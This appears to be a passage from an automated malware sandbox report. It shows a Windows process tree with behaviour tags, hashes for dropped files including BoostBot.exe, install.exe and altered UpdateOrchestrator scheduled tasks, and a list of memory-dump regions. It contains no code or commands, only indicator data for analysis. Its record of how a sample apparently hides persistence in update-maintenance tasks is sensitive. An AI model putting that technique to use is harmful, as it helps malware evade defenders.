                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3244
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                    1⤵
                                                                                                      PID:3628
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:1320
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:5064
                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                        1⤵
                                                                                                          PID:1004
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4092
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:4628
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:4912
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:1952
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:2564
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:1404
                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1412
                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe 74984d018bf07cc1749fe4af2f70aa21 R+SJbcIoIEy/YMVvajWhgg.0.1.0.0.0
                                                                                                                      1⤵
                                                                                                                      • Sets service image path in registry
                                                                                                                      PID:4568
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        2⤵
                                                                                                                          PID:5104
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                        1⤵
                                                                                                                          PID:1772
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:800
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:4524
                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:4708

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                                              Filesize

                                                                                                                              409KB

                                                                                                                              MD5

                                                                                                                              404ab800bbe49c36bd64d0d73600b59a

                                                                                                                              SHA1

                                                                                                                              4c8dff2702fada108f7477ad357067310b584366

                                                                                                                              SHA256

                                                                                                                              5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                                              SHA512

                                                                                                                              d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4aq2wfgr.uv5.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                              Filesize

                                                                                                                              162KB

                                                                                                                              MD5

                                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                              SHA1

                                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                              SHA256

                                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                              SHA512

                                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                              SHA1

                                                                                                                              98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                              SHA256

                                                                                                                              ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                              SHA512

                                                                                                                              c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              f313c5b4f95605026428425586317353

                                                                                                                              SHA1

                                                                                                                              06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                              SHA256

                                                                                                                              129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                              SHA512

                                                                                                                              b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                              SHA1

                                                                                                                              a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                              SHA256

                                                                                                                              98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                              SHA512

                                                                                                                              1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                              SHA1

                                                                                                                              63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                              SHA256

                                                                                                                              727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                              SHA512

                                                                                                                              f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                              SHA1

                                                                                                                              5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                              SHA256

                                                                                                                              55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                              SHA512

                                                                                                                              5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                            • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              0b990e24f1e839462c0ac35fef1d119e

                                                                                                                              SHA1

                                                                                                                              9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                              SHA256

                                                                                                                              a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                              SHA512

                                                                                                                              c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                              SHA1

                                                                                                                              445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                              SHA256

                                                                                                                              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                              SHA512

                                                                                                                              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              aa187cac09f051e24146ad549a0f08a6

                                                                                                                              SHA1

                                                                                                                              2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                              SHA256

                                                                                                                              7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                              SHA512

                                                                                                                              960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                            • memory/332-122-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/332-115-0x00000226AD5A0000-0x00000226AD5CB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/332-121-0x00000226AD5A0000-0x00000226AD5CB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/516-126-0x000001CDB5D80000-0x000001CDB5DAB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/532-76-0x00007FFB3BAA0000-0x00007FFB3BB5E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/532-75-0x00007FFB3C8B0000-0x00007FFB3CAA5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/532-70-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/532-69-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/532-68-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/532-77-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/532-67-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/532-74-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/616-80-0x000001383C450000-0x000001383C475000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              148KB

                                                                                                                            • memory/616-88-0x000001383C480000-0x000001383C4AB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/616-82-0x000001383C480000-0x000001383C4AB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/616-89-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/616-81-0x000001383C480000-0x000001383C4AB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/672-99-0x00000246BD170000-0x00000246BD19B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/672-100-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/672-93-0x00000246BD170000-0x00000246BD19B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/952-110-0x000001F20C4D0000-0x000001F20C4FB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/952-111-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/952-104-0x000001F20C4D0000-0x000001F20C4FB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/2864-66-0x00007FFB3BAA0000-0x00007FFB3BB5E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/2864-64-0x0000017682610000-0x000001768263A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              168KB

                                                                                                                            • memory/2864-65-0x00007FFB3C8B0000-0x00007FFB3CAA5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/3972-7-0x00007FFB1DC33000-0x00007FFB1DC35000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/3972-24-0x00007FFB1DC30000-0x00007FFB1E6F1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3972-19-0x0000016B24780000-0x0000016B247A2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/3972-14-0x00007FFB1DC30000-0x00007FFB1E6F1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3972-8-0x00007FFB1DC30000-0x00007FFB1E6F1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4172-30-0x0000000006B50000-0x0000000006B8C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              240KB

                                                                                                                            • memory/4172-29-0x0000000006610000-0x0000000006622000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              72KB

                                                                                                                            • memory/4172-28-0x0000000005A50000-0x0000000005AB6000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/4172-27-0x00000000059B0000-0x0000000005A42000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              584KB

                                                                                                                            • memory/4172-26-0x0000000005F60000-0x0000000006504000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              5.6MB

                                                                                                                            • memory/4172-25-0x0000000000ED0000-0x0000000000F3C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              432KB

                                                                                                                            • memory/4756-54-0x0000000006CA0000-0x0000000006CAA000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              40KB